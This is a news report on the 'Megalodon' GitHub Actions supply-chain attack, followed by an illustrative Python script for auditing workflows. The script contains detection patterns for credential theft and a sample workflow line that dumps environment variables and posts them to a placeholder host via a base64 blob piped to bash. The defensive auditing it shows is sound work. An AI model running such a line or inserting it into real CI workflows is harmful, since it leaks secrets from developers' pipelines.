Megalodon Malware Unleashes Devastating Attack, Compromising Over 5,500 GitHub Repositories
- John Jordan
A sophisticated and automated cyberattack campaign, dubbed "Megalodon," has successfully infiltrated over 5,500 GitHub repositories within a mere six-hour window. The attack, which occurred on May 18, 2026, exploited malicious CI/CD workflows to exfiltrate sensitive data, including cloud credentials, API keys, and source code secrets, marking a significant escalation in software supply chain threats.
Key Takeaways
Over 5,500 GitHub repositories were compromised in a rapid, automated attack.
Attackers used forged identities and deceptive commit messages to inject malicious GitHub Actions workflows.
The malware targeted a wide range of sensitive data, including cloud credentials, SSH keys, and OIDC tokens.
The campaign highlights a new era of supply chain attacks, posing a significant threat to developers worldwide.
The Megalodon Campaign Unveiled
Cybersecurity researchers have detailed the alarming scope of the Megalodon campaign, which saw 5,718 malicious commits pushed to 5,561 distinct GitHub repositories between 11:36 a.m. and 5:48 p.m. UTC on May 18, 2026. The attackers employed throwaway GitHub accounts with randomized usernames and forged author identities such as "build-bot," "auto-ci," "ci-bot," and "pipeline-bot." These were used to inject base64-encoded bash payloads within GitHub Actions workflows, disguised as routine CI maintenance.
Data Exfiltration and Payload Variants
The primary objective of the Megalodon malware was to harvest a broad range of sensitive data from the CI environment. This included:
CI environment variables and cloud credentials (AWS, Google Cloud, Azure)
SSH private keys and Docker/Kubernetes configurations
Vault tokens and Terraform credentials
API keys, database connection strings, JWTs, and PEM private keys
GitHub Actions OIDC tokens and other CI/CD tokens
Configuration files like .env and credentials.json
Two payload variants were observed: "SysDiag," a mass variant triggered on every push and pull request, and "Optimize-Build," a targeted variant activated only on manual workflow dispatch. The latter was used in the compromise of the @tiledesk/tiledesk-server npm package, where the malicious code was embedded within the GitHub Actions workflow, not the application code itself.
A New Era of Supply Chain Attacks
Experts warn that the Megalodon attack signifies a dangerous evolution in cyber threats, moving beyond individual user compromises to target the interconnected software supply chain. The attackers' ability to mimic legitimate CI processes and leverage trusted platforms like GitHub makes detection exceptionally challenging. This trend is expected to continue, with researchers anticipating an "endless wave" of attacks targeting developers globally. The fallout from such attacks underscores the critical need for enhanced security practices, including rigorous auditing of CI/CD workflows, prompt credential rotation, and the adoption of zero-trust security principles.
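The indicators the article describes, forged bot identities committing to workflow files and base64 blobs decoded straight into a shell from a run step, can be checked mechanically as part of the workflow auditing recommended above. The Python script below is an added example, not code from the article or from the researchers it cites: the indicator lists, the hint labels, the two sample workflows and the sample commit are constructed for demonstration, and the function names are our own. The environment variable names it looks for (ACTIONS_ID_TOKEN_REQUEST_TOKEN, GITHUB_TOKEN, VAULT_TOKEN) are real GitHub Actions and Vault names.

```python
"""Audit helper for the indicators described above: forged CI identities and
base64-encoded shell payloads hidden in GitHub Actions workflow files.

Added illustrative example; not tooling from the article or the researchers
it cites. Indicator lists, sample workflows and the sample commit are
constructed for demonstration."""
import base64
import re

# Forged author identities named in the article.
SUSPICIOUS_AUTHORS = {"build-bot", "auto-ci", "ci-bot", "pipeline-bot"}

# Shell idiom that decodes an inline blob and hands it to a shell.
DECODE_AND_RUN = re.compile(r"base64\s+(?:-d|--decode)\s*\|\s*(?:bash|sh)\b")

# A run of 40+ base64-alphabet characters, optionally padded.
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Things a decoded payload references when it is after credentials.
# Labels are ours; the variable names are real GitHub Actions / Vault names.
SECRET_HINTS = [
    ("environment dump", re.compile(r"\bprintenv\b|\benv\b")),
    ("credential files", re.compile(r"\.env\b|credentials\.json|\.ssh/|\.aws/|\.kube/|\.docker/")),
    ("CI/OIDC tokens", re.compile(r"VAULT_TOKEN|ACTIONS_ID_TOKEN_REQUEST_TOKEN|GITHUB_TOKEN")),
    ("network upload", re.compile(r"\bcurl\b|\bwget\b")),
]


def decode_blobs(text):
    """Return every base64 blob in `text` that decodes to readable ASCII."""
    decoded = []
    for match in BASE64_BLOB.finditer(text):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
            script = raw.decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or binary rather than a script
        if all(ch.isprintable() or ch in "\n\t" for ch in script):
            decoded.append(script)
    return decoded


def audit_workflow(workflow_text):
    """Return human-readable findings for one workflow file (empty if clean)."""
    findings = []
    if DECODE_AND_RUN.search(workflow_text):
        findings.append("run step decodes a base64 blob and pipes it into a shell")
    for script in decode_blobs(workflow_text):
        labels = [label for label, pattern in SECRET_HINTS if pattern.search(script)]
        if labels:
            findings.append("inline blob decodes to a script touching: " + ", ".join(labels))
    return findings


def audit_commit(author, changed_files, workflow_texts):
    """Combine commit metadata with workflow contents into one list of findings."""
    findings = []
    if author.lower() in SUSPICIOUS_AUTHORS:
        findings.append(f"author '{author}' matches a forged CI identity")
    touched = [path for path in changed_files if path.startswith(".github/workflows/")]
    if touched:
        findings.append("commit modifies workflow file(s): " + ", ".join(touched))
    for path, text in workflow_texts.items():
        findings.extend(f"{path}: {finding}" for finding in audit_workflow(text))
    return findings


# --- constructed sample inputs (not the campaign's actual files) -----------
BENIGN_WORKFLOW = """\
name: CI
on: [push, pull_request]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
"""

# The encoded script is built here so the sample stays readable; it only
# dumps the environment and posts it to a placeholder (.invalid) host.
_SAMPLE_SCRIPT = b"printenv | curl -s --data-binary @- https://collector.example.invalid/"
_SAMPLE_BLOB = base64.b64encode(_SAMPLE_SCRIPT).decode()

SUSPICIOUS_WORKFLOW = f"""\
name: SysDiag
on: [push, pull_request]
jobs:
  diag:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: echo {_SAMPLE_BLOB} | base64 -d | bash
"""

if __name__ == "__main__":
    sample_files = {".github/workflows/ci.yml": SUSPICIOUS_WORKFLOW}
    for finding in audit_commit("build-bot", list(sample_files), sample_files):
        print("!", finding)
```

The regex scan over raw text keeps the example self-contained; a production audit would parse the YAML and walk the `run:` steps of every job, and any credential a flagged workflow could have reached should be rotated rather than merely reviewed, since the workflow may already have run.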
Sources
Megalodon GitHub Attack Targets 5,561 Repos with Malicious CI/CD Workflows, The Hacker News.
New Megalodon Malware Hits Thousands of GitHub Projects, SQ Magazine.
Megalodon Malware Compromised 5,500+ GitHub Repos Within 6 Hours, CyberSecurityNews.
Megalodon Malware Compromised 5,500+ GitHub Repositories, Cyber Press.
